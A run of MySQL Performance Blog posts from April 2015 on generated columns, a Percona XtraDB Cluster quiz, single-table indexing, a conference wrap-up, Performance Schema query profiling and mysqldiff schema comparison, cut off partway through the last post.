About 2 weeks ago Oracle published the MySQL 5.7.7-labs-json version, which includes a very interesting feature called “Generated columns” (also known as Virtual or Computed columns). MariaDB has a similar feature as well: Virtual (Computed) Columns.

The idea is very simple: if we store a column

`FlightDate` date

in our table, we may want to filter or group by year(FlightDate), month(FlightDate) or even dayofweek(FlightDate). The “brute-force” approach is to use the above Date and Time MySQL functions in the query; however, that will prevent MySQL from using an index (see below). Generated columns allow you to declare a “virtual”, non-stored column which is computed based on an existing field; you can then add an index on that virtual column, so the query will use that index.

Here is the original example:

CREATE TABLE `ontime` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `FlightDate` date DEFAULT NULL,
  `Carrier` char(2) DEFAULT NULL,
  `OriginAirportID` int(11) DEFAULT NULL,
  `OriginCityName` varchar(100) DEFAULT NULL,
  `OriginState` char(2) DEFAULT NULL,
  `DestAirportID` int(11) DEFAULT NULL,
  `DestCityName` varchar(100) DEFAULT NULL,
  `DestState` char(2) DEFAULT NULL,
  `DepDelayMinutes` int(11) DEFAULT NULL,
  `ArrDelayMinutes` int(11) DEFAULT NULL,
  `Cancelled` tinyint(4) DEFAULT NULL,
  `CancellationCode` char(1) DEFAULT NULL,
  `Diverted` tinyint(4) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `FlightDate` (`FlightDate`)
) ENGINE=InnoDB

Now I want to find all flights on Sundays (in 2013) and group by airline.

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm WHERE dayofweek(FlightDate) = 7 group by carrier
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: ontime_sm
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 151253427
        Extra: Using where; Using temporary; Using filesort
Results: 32 rows in set (1 min 57.93 sec)

The problem here is that MySQL will not be able to use an index when you apply a function which “extracts” something from the column. The standard approach is to “materialize” the column:

ALTER TABLE ontime_sm ADD Flight_dayofweek tinyint NOT NULL;

Then we need to load data into it by running “UPDATE ontime_sm SET Flight_dayofweek = dayofweek(flight_date)”. After that we will also need to change the application to maintain the additional column, or use a trigger to update it. Here is the trigger example:

CREATE DEFINER = CURRENT_USER
TRIGGER ontime_insert BEFORE INSERT ON ontime_sm_triggers
FOR EACH ROW
SET NEW.Flight_dayofweek = dayofweek(NEW.FlightDate);

One problem with the trigger is that it is slow. In my simple example, “copying” the table with “insert into ontime_sm_copy select * from ontime_sm” was almost 2x slower when the trigger was on.

The Generated Columns feature from the MySQL 5.7.7-labs-json version (the only version that supports it at the time of writing) solves this problem. Here is an example which demonstrates its use:

CREATE TABLE `ontime_sm_virtual` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `FlightDate` date DEFAULT NULL,
  `Carrier` char(2) DEFAULT NULL,
  `OriginAirportID` int(11) DEFAULT NULL,
  `OriginCityName` varchar(100) DEFAULT NULL,
  `OriginState` char(2) DEFAULT NULL,
  `DestAirportID` int(11) DEFAULT NULL,
  `DestCityName` varchar(100) DEFAULT NULL,
  `DestState` char(2) DEFAULT NULL,
  `DepDelayMinutes` int(11) DEFAULT NULL,
  `ArrDelayMinutes` int(11) DEFAULT NULL,
  `Cancelled` tinyint(4) DEFAULT NULL,
  `CancellationCode` char(1) DEFAULT NULL,
  `Diverted` tinyint(4) DEFAULT NULL,
  `CRSElapsedTime` int(11) DEFAULT NULL,
  `ActualElapsedTime` int(11) DEFAULT NULL,
  `AirTime` int(11) DEFAULT NULL,
  `Flights` int(11) DEFAULT NULL,
  `Distance` int(11) DEFAULT NULL,
  `Flight_dayofweek` tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL,
  PRIMARY KEY (`id`),
  KEY `Flight_dayofweek` (`Flight_dayofweek`)
) ENGINE=InnoDB

Here we add Flight_dayofweek tinyint(4) GENERATED ALWAYS AS (dayofweek(FlightDate)) VIRTUAL column and index it.

Now MySQL can use this index:

mysql> EXPLAIN SELECT carrier, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by carrier
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: ontime_sm_virtual
   partitions: NULL
         type: ref
possible_keys: Flight_dayofweek
          key: Flight_dayofweek
      key_len: 2
          ref: const
         rows: 165409
     filtered: 100.00
        Extra: Using where; Using temporary; Using filesort

To further increase the performance of this query, we want to add a combined index on (Flight_dayofweek, carrier) so MySQL will avoid creating a temporary table. However, it is not currently supported:

mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, carrier);
ERROR 3105 (HY000): 'Virtual generated column combines with other columns to be indexed together' is not supported for generated columns.

We can add an index on 2 generated columns though, which is good. So a trick here is to create a “dummy” virtual column on “carrier” and index the 2 of those columns:

mysql> alter table ontime_sm_virtual add Carrier_virtual char(2) GENERATED ALWAYS AS (Carrier) VIRTUAL;
Query OK, 0 rows affected (0.43 sec)
Records: 0  Duplicates: 0  Warnings: 0

mysql> alter table ontime_sm_virtual add key comb(Flight_dayofweek, Carrier_virtual);
Query OK, 999999 rows affected (36.79 sec)
Records: 999999  Duplicates: 0  Warnings: 0

mysql> EXPLAIN SELECT Carrier_virtual, count(*) FROM ontime_sm_virtual WHERE Flight_dayofweek = 7 group by Carrier_virtual
*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: ontime_sm_virtual
   partitions: NULL
         type: ref
possible_keys: Flight_dayofweek,comb
          key: comb
      key_len: 2
          ref: const
         rows: 141223
     filtered: 100.00
        Extra: Using where; Using index

Now MySQL will use an index and completely avoid the filesort.

Last but not least: loading data into a table with generated columns is significantly faster than loading it into the same table with triggers:

mysql> insert into ontime_sm_triggers (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode, Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm;
Query OK, 999999 rows affected (27.86 sec)
Records: 999999  Duplicates: 0  Warnings: 0

mysql> insert into ontime_sm_virtual (id, YearD, FlightDate, Carrier, OriginAirportID, OriginCityName, OriginState, DestAirportID, DestCityName, DestState, DepDelayMinutes, ArrDelayMinutes, Cancelled, CancellationCode, Diverted, CRSElapsedTime, ActualElapsedTime, AirTime, Flights, Distance) select * from ontime_sm;
Query OK, 999999 rows affected (16.29 sec)
Records: 999999  Duplicates: 0  Warnings: 0

Now the big disappointment: none of the operations on generated columns are online right now.

mysql> alter table ontime_sm_virtual add Flight_year year GENERATED ALWAYS AS (year(FlightDate)) VIRTUAL, add key (Flight_year), lock=NONE;
ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED.

mysql> alter table ontime_sm_virtual add key (Flight_year), lock=NONE;
ERROR 1846 (0A000): LOCK=NONE is not supported. Reason: '%s' is not supported for generated columns.. Try LOCK=SHARED.

I hope this will be fixed in future releases.

Conclusion

The generated columns feature is very useful. Imagine the ability to add a column + index for any “logical” piece of data without actually duplicating the data. And this can be any function: date/time/calendar, text (extract(), reverse(), metaphone()) or anything else. I hope this feature will be available in MySQL 5.7 GA. Finally, I wish adding a generated column and index could be done online (it cannot right now).




Test your knowledge: Percona XtraDB Cluster (PXC) quiz

April 28, 2015 - 3:00am

I often talk with people who are very interested in the features of Percona XtraDB Cluster (PXC) such as synchronous and parallel replication, multi-node writing and high availability. However, some get confused when operating a real PXC cluster because they do not fully realize the implications of these features. So here is a fun way to test your PXC knowledge: try to answer these 12 questions about PXC! (You will find the answers at the end of the post.)

Workload

1. With Galera 3.x, support for MyISAM is experimental. When can we expect to have full MyISAM support?
a. This will never happen as Galera is designed for transactional storage engines.
b. This is planned for Galera 4.0.

2. Why aren’t all workloads a good fit for PXC?
a. Execution plans can change compared to a regular MySQL server, so performance is sometimes not as good as with a regular MySQL server.
b. Large transactions and write hotspots can create performance issues with Galera.

3. For workloads with a write hot spot, writing on all nodes to distribute the load is a good way to solve the issue.
a. True
b. False

4. Optimistic locking is used in a PXC cluster. What does it mean?
a. When a transaction starts on a node, locks are only set on this node but never on the remote nodes.
b. When a transaction starts on a node, locks are only set on the remote nodes but never on the local node.
c. Write conflict detection is built-in, so there is no need to set locks at all.

Replication

5. Galera implements virtually synchronous replication. What does it mean?
a. A transaction is first committed locally, and then it is committed on all remote nodes at the same exact point in time.
b. Transactions are replicated synchronously, but they are applied asynchronously on remote nodes.
c. Replication is actually asynchronous, but as it is faster than MySQL replication, marketing decided to name it ‘virtually synchronous’.

6. When the receive queue of a node exceeds a threshold, the node sends flow control messages. What is the goal of these flow control messages?
a. They instruct the other nodes that they must pause processing writes for some time, to allow the slow node to catch up.
b. The other nodes trigger an election and if they have quorum they will evict the slow node.
c. The messages can be used by monitoring systems to detect a slow node, but they have no effect.

7. When you change the state of a node to Donor/Desynced, what happens?
a. The node stops receiving writes from the other nodes.
b. The node intentionally replicates writes at a slower pace; this is roughly equivalent to a delayed replica when using MySQL replication.
c. The node keeps working as usual, but it will not send flow control messages if its receive queue becomes large.

High Availability

8. You should always use an odd number of nodes, because with an even number (say 4 or 6), the failure of one node will create a split-brain situation.
a. True
b. False

9. With a 3-node cluster, what happens if you gracefully stop 2 nodes?
a. The remaining node can process queries normally.
b. The remaining node is up but it stops processing queries as it does not have quorum.

Operations

10. If a node has been stopped for less than 5 minutes, it will always perform an IST.
a. True: SST is only performed after a node crash, never after a regular shutdown.
b. False: it depends on the gcache size.

11. Even with datasets under 5GB, the preferred SST method is xtrabackup-v2, not mysqldump.
a. True
b. False

12. Migration from a master-slave setup to a PXC cluster always involves a downtime to dump and reload the database.
a. True, because MySQL replication and Galera replication are incompatible.
b. False, one node of the PXC cluster can be set up as an asynchronous replica of the old master.

Solutions

1. a      2. b      3. b
4. a      5. b      6. a
7. c      8. b      9. a
10. b    11. a    12. b
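
For question 12, here is a minimal sketch of the no-downtime path (host name, user, password and binlog coordinates are placeholders; this assumes classic binary-log replication from the old master):

-- run on one node of the new PXC cluster
CHANGE MASTER TO
  MASTER_HOST='old-master.example.com',
  MASTER_USER='repl',
  MASTER_PASSWORD='replpass',
  MASTER_LOG_FILE='mysql-bin.000001',
  MASTER_LOG_POS=4;
START SLAVE;
-- writes applied by this asynchronous replica are then propagated
-- to the other PXC nodes through Galera replication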

The post Test your knowledge: Percona XtraDB Cluster (PXC) quiz appeared first on MySQL Performance Blog.

Indexing 101: Optimizing MySQL queries on a single table

April 27, 2015 - 3:00am

I have recently seen several cases when performance for MySQL queries on a single table was terrible. The reason was simple: the wrong indexes were added and so the execution plan was poor. Here are guidelines to help you optimize various kinds of single-table queries.

Disclaimer: I will be presenting general guidelines and I do not intend to cover all scenarios. I am pretty confident that you can find examples where what I am writing does not work, but I am also confident that it will help you most of the time. Also, to keep things simple, I will not discuss features you can find in MySQL 5.6+, like Index Condition Pushdown. Be aware that such features can actually make a significant difference in query response time (for good or for bad).

What an index can do for you

An index can perform up to 3 actions: filter, sort/group and cover. While the first 2 actions are self-explanatory, not everyone may know what a ‘covering index’ is. Actually that’s very easy. The general workflow for a basic query is:
1. Use an index to find matching records and get the pointers to data.
2. Use the pointers to fetch the corresponding data.
3. Return records.

When a covering index can be used, the index already covers all fields requested in the query, so step #2 can be skipped and the workflow is now:
1. Use an index to find matching records
2. Return records

In many cases, indexes are small and can fit in memory while data is large and does not fit in memory: by using a covering index, you can avoid lots of disk operations and performance can be orders of magnitude better.
Let’s now look at different common scenarios.

Single equality

This is the most basic scenario:

SELECT * FROM t WHERE c = 100

The idea is of course to add an index on (c). However, note that if the criterion is not selective enough, the optimizer may choose to perform a full table scan, which will certainly be more efficient.
Also note that a frequent variation of this query is when you only select a small subset of fields instead of all fields:

SELECT c1, c2 FROM t WHERE c = 100

Here it could make sense to create an index on (c, c1, c2) because it will be a covering index. Do not create an index on (c1, c2, c)! It will still be covering but it will not be usable for filtering (remember that you can only use a left-most prefix of an index to filter).
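
As a quick sketch (index name assumed), the covering index could be created and verified like this:

ALTER TABLE t ADD INDEX idx_c_c1_c2 (c, c1, c2);
-- EXPLAIN SELECT c1, c2 FROM t WHERE c = 100
-- should now show 'Using index' in the Extra column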

Multiple equalities

SELECT * FROM t WHERE c = 100 and d = 'xyz'

It is also very easy to optimize: just add an index on (c, d) or (d, c).

The main mistake here is to add 2 indexes: one on (c) and one on (d). Granted, MySQL is able to use both indexes with the index_merge algorithm, but it is almost always a very bad option.
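
For instance (index names assumed):

-- Good: one composite index that filters on both columns
ALTER TABLE t ADD INDEX idx_c_d (c, d);
-- Usually bad: two separate indexes that push the optimizer toward index_merge
-- ALTER TABLE t ADD INDEX idx_c (c);
-- ALTER TABLE t ADD INDEX idx_d (d);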

Equality and inequality

SELECT * FROM t WHERE c > 100 and d = 'xyz'

Here we must be careful: as soon as a column is used with an inequality, further columns in the index cannot be used for filtering.

Therefore if we create an index on (d, c), we will be able to filter on both c and d, which is good.
But if we create an index on (c, d), we will only be filtering on c, which is less efficient.

So unlike the situation when you have equalities, order of columns matters when inequalities are used.

Multiple inequalities

SELECT * FROM t WHERE c > 100 and b < 10 and d = 'xyz'

As we have 2 inequalities, we already know that we will not be able to filter on both conditions (*). So we have to make a decision: will we filter on (d, b) or on (d, c)?

It is not possible to tell which option is better without looking at the data: simply choose the column where the inequality is the most selective. The main point is that you must put the column(s) with an equality first.

(*) Actually there is a way to ‘filter’ on both inequalities: partition on b and add an index on (d, c), or partition on c and add an index on (d, b). The details are out of the scope of this post but it might be an option for some situations.
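
A rough sketch of that partitioning variant, with all column types, names and ranges purely illustrative:

CREATE TABLE t (
  id INT NOT NULL AUTO_INCREMENT,
  b INT NOT NULL,
  c INT NOT NULL,
  d VARCHAR(16) NOT NULL,
  PRIMARY KEY (id, b),   -- the partitioning column must be part of every unique key
  KEY idx_d_c (d, c)     -- the index filters on the equality (d), then the inequality (c)
) ENGINE=InnoDB
PARTITION BY RANGE (b) (
  PARTITION p0 VALUES LESS THAN (10),       -- rows with b < 10 land here, so pruning handles b
  PARTITION pmax VALUES LESS THAN MAXVALUE
);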

Equalities and sort

SELECT * FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

As mentioned in the first paragraph, an index can filter and sort, so this query is easy to optimize. However, as with inequalities, we must carefully choose the order of the columns in the index: the rule is that we filter first, and then sort.

With that in mind, it is easy to know that (c, d, b) or (d, c, b) will be good indexes while (b, c, d) or (b, d, c) are not as good (they will sort but not filter).

And if we have:

SELECT c1, c2 FROM t WHERE c = 100 and d = 'xyz' ORDER BY b

We can create a super efficient index that will filter, sort and be covering: (c, d, b, c1, c2).
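
Sketched out (index name assumed):

ALTER TABLE t ADD INDEX idx_cover (c, d, b, c1, c2);
-- filters on (c, d), sorts on b, and covers c1 and c2,
-- so EXPLAIN should show 'Using index' with no filesort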

Inequality and sort

We have 2 main variations here. The first one is:

SELECT * FROM t WHERE c > 100 and d = 'xyz' ORDER BY b

Two options look reasonable in this case:
1. Filter on d and sort by b, i.e. an index on (d, b).
2. Filter on d and c, i.e. an index on (d, c).

Which strategy is more efficient? It will depend on your data, so you will have to experiment.

The second variation is:

SELECT * FROM t WHERE c > 100 ORDER BY b

This time we have no equality so we have to choose between filtering and sorting. Most likely you will choose filtering.

Conclusion

Not all cases have been covered in this post but you can already see that in some cases you will create poor MySQL indexes if you are not careful. In a future post, I will present a case that can look confusing at first sight but which is easy to understand if you already know everything mentioned here.

The post Indexing 101: Optimizing MySQL queries on a single table appeared first on MySQL Performance Blog.

Percona Live & OpenStack Live 2015 wrap-up

April 24, 2015 - 3:00am

Peter Zaitsev kicks off Percona Live 2015

With highlights that included news of Percona’s acquisition of Tokutek, a lively keynote discussion with Apple legend Steve “Woz” Wozniak, scores of technical sessions, tutorials and a festive MySQL community dinner and game night, last week’s Percona Live MySQL Conference and Expo had something for everyone.

More than 1,200 attendees from around the world converged upon Santa Clara, California for the event, which included for the first time a two-day OpenStack Live track alongside a two-day crash course for aspiring MySQL DBAs called “MySQL 101.”

With the Tokutek acquisition, announced last Tuesday by Peter Zaitsev, Percona becomes the first company to offer both MySQL and MongoDB software and solutions. Percona has also taken over development and support for TokuDB® and TokuMX™ as well as the revolutionary Fractal Tree® indexing technology that enables those products to deliver improved performance, reliability and compression for modern Big Data applications. Peter talks in depth about the technologies in last week’s post.

Apple legend Steve Wozniak at Percona Live

Also on Tuesday, “Woz” and Jim Doherty, EVP of Sales & Marketing, talked about a range of issues associated with technology and innovation.

The Apple co-founder and inventor of the Apple I and Apple II computers also shared his thoughts on what influenced him growing up, his approach to problem solving, childhood education, artificial intelligence and more. (You can view the entire 45-minute conversation by clicking on the Woz to the left.)

Tweets of #PerconaLive during the conference hit nearly 2,000 – many with photos that are worth looking at (see all of the tweets here).

The other keynotes included:

Community Appreciation Game Night

In addition to the above keynotes, all of the sessions were recorded and will be available soon for registered attendees who had access to them at the conference. Most of the slides will be available soon to everyone via the Percona Live 2015 site. Just click the session you’re interested in and scroll to the bottom of the page to view the slides.

Congratulations go out to all of the MySQL Community Awards 2015 winners with a special thanks to Shlomi Noach and Jeremy Cole for running the awards program.

Special thanks also goes out to the Percona Live and OpenStack Live 2015 conference committees, which together organized a fantastic week of events. And of course none of the events would have been possible without our generous Percona Live sponsors and OpenStack Live sponsors.

Finally, a round of applause for Percona’s director of conferences, Kortney Runyan, for her monumental efforts organizing the event. Kortney could not have succeeded without the support of our multiple service vendors including Ireland Presentations, Carleson Production Group, Tricord, the Hyatt Santa Clara, and the Santa Clara Convention Center, to name just a few.

Also announced last week was the new venue for Percona Live Europe, which will be held September 21-22 in Amsterdam. Percona Live Amsterdam promises to be bigger and better than ever. The Call for Papers is open for this exciting new venue so be sure to submit your proposals now.

See you in Amsterdam this September! And be sure to save the date for Percona Live 2016 – April 18-21 at the Hyatt Santa Clara and the Santa Clara Convention Center.

P.S. For more Percona Live and OpenStack Live 2015 photos…

The post Percona Live & OpenStack Live 2015 wrap-up appeared first on MySQL Performance Blog.

Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome!

April 21, 2015 - 9:08am

MySQL sharding is one of the most used and surely the most abused MySQL scaling technologies. My April 2 Dzone article, “To Shard, or Not to Shard,” proved there is indeed quite an interest in this topic.

As such, I’m hosting a live webinar tomorrow (April 22) that will shed light on questions about sharding with MySQL. It’s titled “To Shard or Not to Shard: That is the Question!”

I’ll be answering questions such as:

  • Is sharding right for your application or should you use other scaling technologies?
  • If you’re sharding, what things do you need to consider and which questions do you need to have answered?
  • What kind of specific technologies can assist you with sharding?

I hope you can make it for this April 22 webinar. It starts at 10 a.m. Pacific time. Please register now and bring your questions, as sharing them with me and the other attendees is half of the fun of live webinars.

Or if you prefer, share your questions about sharding with MySQL in the comments section below, and I’ll do my best to answer them. I’ll be writing a followup post that will include all questions and my answers soon. A recording of this webinar along with my slides will also be available here afterwards.

The post Considering Sharding with MySQL? Join my April 22 webinar. Questions welcome! appeared first on MySQL Performance Blog.

Profiling MySQL queries from Performance Schema

April 16, 2015 - 10:49am

When optimizing queries and investigating performance issues, MySQL comes with built-in support for profiling queries, aka SET profiling = 1;. This is already awesome and simple to use, but why the PERFORMANCE_SCHEMA alternative?

Because profiling will be removed soon (it is already deprecated in MySQL 5.6 and 5.7), and the built-in profiling capability can only be enabled per session. This means that you cannot capture profiling information for queries running from other connections. If you are using Percona Server, the profiling option for log_slow_verbosity is a nice alternative; unfortunately, not everyone is using Percona Server.
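
One prerequisite worth noting before the demo: the stage instruments and the stage/statement history consumers used below are not all enabled by default. Here is a rough sketch of turning them on at runtime (consumer and instrument names as of MySQL 5.6; adjust to your needs):

UPDATE performance_schema.setup_consumers
   SET ENABLED = 'YES'
 WHERE NAME LIKE 'events_stages%' OR NAME LIKE 'events_statements%';
UPDATE performance_schema.setup_instruments
   SET ENABLED = 'YES', TIMED = 'YES'
 WHERE NAME LIKE 'stage/%';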

Now, for a quick demo: I execute a simple query and profile it below. Note that all of these commands are executed from a single session to my test instance.

mysql> SHOW PROFILES;
+----------+------------+----------------------------------------+
| Query_ID | Duration   | Query                                  |
+----------+------------+----------------------------------------+
|        1 | 0.00011150 | SELECT * FROM sysbench.sbtest1 LIMIT 1 |
+----------+------------+----------------------------------------+
1 row in set, 1 warning (0.00 sec)

mysql> SHOW PROFILE SOURCE FOR QUERY 1;
+----------------------+----------+-----------------------+------------------+-------------+
| Status               | Duration | Source_function       | Source_file      | Source_line |
+----------------------+----------+-----------------------+------------------+-------------+
| starting             | 0.000017 | NULL                  | NULL             |        NULL |
| checking permissions | 0.000003 | check_access          | sql_parse.cc     |        5797 |
| Opening tables       | 0.000021 | open_tables           | sql_base.cc      |        5156 |
| init                 | 0.000009 | mysql_prepare_select  | sql_select.cc    |        1050 |
| System lock          | 0.000005 | mysql_lock_tables     | lock.cc          |         306 |
| optimizing           | 0.000002 | optimize              | sql_optimizer.cc |         138 |
| statistics           | 0.000006 | optimize              | sql_optimizer.cc |         381 |
| preparing            | 0.000005 | optimize              | sql_optimizer.cc |         504 |
| executing            | 0.000001 | exec                  | sql_executor.cc  |         110 |
| Sending data         | 0.000025 | exec                  | sql_executor.cc  |         190 |
| end                  | 0.000002 | mysql_execute_select  | sql_select.cc    |        1105 |
| query end            | 0.000003 | mysql_execute_command | sql_parse.cc     |        5465 |
| closing tables       | 0.000004 | mysql_execute_command | sql_parse.cc     |        5544 |
| freeing items        | 0.000005 | mysql_parse           | sql_parse.cc     |        6969 |
| cleaning up          | 0.000006 | dispatch_command      | sql_parse.cc     |        1874 |
+----------------------+----------+-----------------------+------------------+-------------+
15 rows in set, 1 warning (0.00 sec)

To demonstrate how we can achieve the same with Performance Schema, we first identify our current connection id. In the real world, you might want to get the connection/processlist id of the thread you want to watch, i.e. from SHOW PROCESSLIST.

mysql> SELECT THREAD_ID INTO @my_thread_id
    -> FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID();
Query OK, 1 row affected (0.00 sec)

Next, we identify the bounding EVENT_IDs for the statement stages. We will look for the statement we want to profile using the query below against the events_statements_history_long table. Your LIMIT clause may vary depending on how many queries the server might be getting.

mysql> SELECT THREAD_ID, EVENT_ID, END_EVENT_ID, SQL_TEXT, NESTING_EVENT_ID
    -> FROM events_statements_history_long
    -> WHERE THREAD_ID = @my_thread_id
    ->   AND EVENT_NAME = 'statement/sql/select'
    -> ORDER BY EVENT_ID DESC LIMIT 3\G
*************************** 1. row ***************************
       THREAD_ID: 13848
        EVENT_ID: 419
    END_EVENT_ID: 434
        SQL_TEXT: SELECT THREAD_ID INTO @my_thread_id FROM threads WHERE PROCESSLIST_ID = CONNECTION_ID()
NESTING_EVENT_ID: NULL
*************************** 2. row ***************************
       THREAD_ID: 13848
        EVENT_ID: 374
    END_EVENT_ID: 392
        SQL_TEXT: SELECT * FROM sysbench.sbtest1 LIMIT 1
NESTING_EVENT_ID: NULL
*************************** 3. row ***************************
       THREAD_ID: 13848
        EVENT_ID: 353
    END_EVENT_ID: 364
        SQL_TEXT: select @@version_comment limit 1
NESTING_EVENT_ID: NULL
3 rows in set (0.02 sec)

From the results above, we are mostly interested in the EVENT_ID and END_EVENT_ID values from the second row; these will give us the stage events of this particular query from the events_stages_history_long table.

mysql> SELECT EVENT_NAME, SOURCE, (TIMER_END-TIMER_START)/1000000000 as 'DURATION (ms)'
    -> FROM events_stages_history_long
    -> WHERE THREAD_ID = @my_thread_id AND EVENT_ID BETWEEN 374 AND 392;
+--------------------------------+----------------------+---------------+
| EVENT_NAME                     | SOURCE               | DURATION (ms) |
+--------------------------------+----------------------+---------------+
| stage/sql/init                 | mysqld.cc:998        |        0.0214 |
| stage/sql/checking permissions | sql_parse.cc:5797    |        0.0023 |
| stage/sql/Opening tables       | sql_base.cc:5156     |        0.0205 |
| stage/sql/init                 | sql_select.cc:1050   |        0.0089 |
| stage/sql/System lock          | lock.cc:306          |        0.0047 |
| stage/sql/optimizing           | sql_optimizer.cc:138 |        0.0016 |
| stage/sql/statistics           | sql_optimizer.cc:381 |        0.0058 |
| stage/sql/preparing            | sql_optimizer.cc:504 |        0.0044 |
| stage/sql/executing            | sql_executor.cc:110  |        0.0008 |
| stage/sql/Sending data         | sql_executor.cc:190  |        0.0251 |
| stage/sql/end                  | sql_select.cc:1105   |        0.0017 |
| stage/sql/query end            | sql_parse.cc:5465    |        0.0031 |
| stage/sql/closing tables       | sql_parse.cc:5544    |        0.0037 |
| stage/sql/freeing items        | sql_parse.cc:6969    |        0.0056 |
| stage/sql/cleaning up          | sql_parse.cc:1874    |        0.0006 |
+--------------------------------+----------------------+---------------+
15 rows in set (0.01 sec)

As you can see, the results are pretty close: not exactly the same, but close. SHOW PROFILE shows Duration in seconds, while the results above are in milliseconds.
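
If you want to skip the manual EVENT_ID lookup, the two steps can be combined into a single query. This is just a sketch reusing @my_thread_id from above; the BETWEEN condition mirrors the manual bounding we just did:

SELECT st.EVENT_NAME, st.SOURCE,
       (st.TIMER_END - st.TIMER_START)/1000000000 AS 'DURATION (ms)'
FROM events_statements_history_long sh
JOIN events_stages_history_long st
  ON st.THREAD_ID = sh.THREAD_ID
 AND st.EVENT_ID BETWEEN sh.EVENT_ID AND sh.END_EVENT_ID
WHERE sh.THREAD_ID = @my_thread_id
  AND sh.SQL_TEXT LIKE 'SELECT * FROM sysbench.sbtest1%'
ORDER BY st.EVENT_ID;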

Some limitations to this method though:

  • As we’ve seen, it takes a few hoops to dish out the information we need. Because we have to identify the statement to profile manually, this procedure may not be easy to port into tools like the sys schema or pstop.
  • Only possible if Performance Schema is enabled (it’s enabled by default since MySQL 5.6.6, yay!)
  • Does not cover all metrics compared to the native profiling, e.g. CONTEXT SWITCHES, BLOCK IO, SWAPS.
  • Depending on how busy the server you are running the tests on is, the sizes of the history tables may be too small; you then either have to increase them via the performance_schema_events_stages_history_long_size variable or lose the history too early. Using ps_history might help in this case, though with a little modification to the queries.
  • The resulting Duration per event may vary; I would think this may be due to the additional timer overhead described in the performance_timers table. In any case we hope to get this cleared up when this bug is fixed.

The post Profiling MySQL queries from Performance Schema appeared first on MySQL Performance Blog.

Checking table definition consistency with mysqldiff

April 15, 2015 - 1:45pm

Data inconsistencies in replication environments are pretty common. There are lots of posts that explain how to fix those using pt-table-checksum and pt-table-sync. Usually we only care about the data, but from time to time we receive this question in support:

How can I check the table definition consistency between servers?

Replication also allows us to have different table definitions between master and slaves. For example, there are some cases where you need indexes on the slaves for querying purposes that are not really needed on the master. There are some other cases where those differences are just a mistake that needs to be fixed.

mysqldiff, included in Oracle’s MySQL Utilities, can help us find those differences and get the information we need to fix them. In this post I’m going to show you how to use it with an example.

Find table definition inconsistencies

mysqldiff allows us to find those inconsistencies by checking the differences between tables on the same server (in different databases) or on different servers (again, possibly in different databases). In this example I’m going to search for differences in table definitions between two different servers, server1 and server2.

The command line is pretty simple. This is used to compare the tables on “test” database:

mysqldiff --server1=user@host1 --server2=user@host2 test:test

If the database name is different:

mysqldiff --server1=user@host1 --server2=user@host2 testdb:anotherdb

If the table name is different:

mysqldiff --server1=user@host1 --server2=user@host2 testdb.table1:anotherdb.anothertable

Now I want to check the table definition consistency between two servers. The database’s name is “employees”:

# mysqldiff --force --server1=root:msandbox@127.0.0.1:21489 --server2=root:msandbox@127.0.0.1:21490 employees:employees
# WARNING: Using a password on the command line interface can be insecure.
# server1 on 127.0.0.1: ... connected.
# server2 on 127.0.0.1: ... connected.
# Comparing `employees` to `employees`                                [PASS]
# Comparing `employees`.`departments` to `employees`.`departments`    [FAIL]
# Object definitions differ. (--changes-for=server1)
#

--- `employees`.`departments`
+++ `employees`.`departments`
@@ -1,6 +1,6 @@
 CREATE TABLE `departments` (
   `dept_no` char(4) NOT NULL,
-  `dept_name` varchar(40) NOT NULL,
+  `dept_name` varchar(256) DEFAULT NULL,
   PRIMARY KEY (`dept_no`),
   UNIQUE KEY `dept_name` (`dept_name`)
 ) ENGINE=InnoDB DEFAULT CHARSET=latin1

# Comparing `employees`.`dept_emp` to `employees`.`dept_emp`          [PASS]
# Comparing `employees`.`dept_manager` to `employees`.`dept_manager`  [PASS]
# Comparing `employees`.`employees` to `employees`.`employees`        [FAIL]
# Object definitions differ. (--changes-for=server1)
#

--- `employees`.`employees`
+++ `employees`.`employees`
@@ -5,5 +5,6 @@
   `last_name` varchar(16) NOT NULL,
   `gender` enum('M','F') NOT NULL,
   `hire_date` date NOT NULL,
-  PRIMARY KEY (`emp_no`)
+  PRIMARY KEY (`emp_no`),
+  KEY `last_name` (`last_name`,`first_name`)
 ) ENGINE=InnoDB DEFAULT CHARSET=latin1

# Comparing `employees`.`salaries` to `employees`.`salaries`          [PASS]
# Comparing `employees`.`titles` to `employees`.`titles`              [PASS]
Compare failed. One or more differences found.

There are at least two differences: one in the departments table and another one in the employees table. The output is similar to diff. By default the tool stops after finding the first difference; that’s why we use --force, to tell the tool to continue checking all the tables.

It shows us that on departments, dept_name is varchar(40) on server1 and varchar(256) on server2. For the employees table, server2 has a KEY (last_name, first_name) that is not present on server1. Why is it taking server2 as the reference? Because of this line:

# Object definitions differ. (--changes-for=server1)

So, the changes shown in the diff are for server1. If you want server2 to be the one changed, with server1 used as the reference, then --changes-for=server2 would be needed.
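
For example (a sketch of the same run with the reference flipped):

mysqldiff --force --changes-for=server2 --server1=root:msandbox@127.0.0.1:21489 --server2=root:msandbox@127.0.0.1:21490 employees:employees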

In some cases the diff output is not really useful. We actually need SQL statements to make the changes on the server. We just need to add --difftype=sql to the command line:

# mysqldiff --force --difftype=sql --server1=root:msandbox@127.0.0.1:21489 --server2=root:msandbox@127.0.0.1:21490 employees:employees
[...]
# Comparing `employees`.`departments` to `employees`.`departments`    [FAIL]
# Transformation for --changes-for=server1:

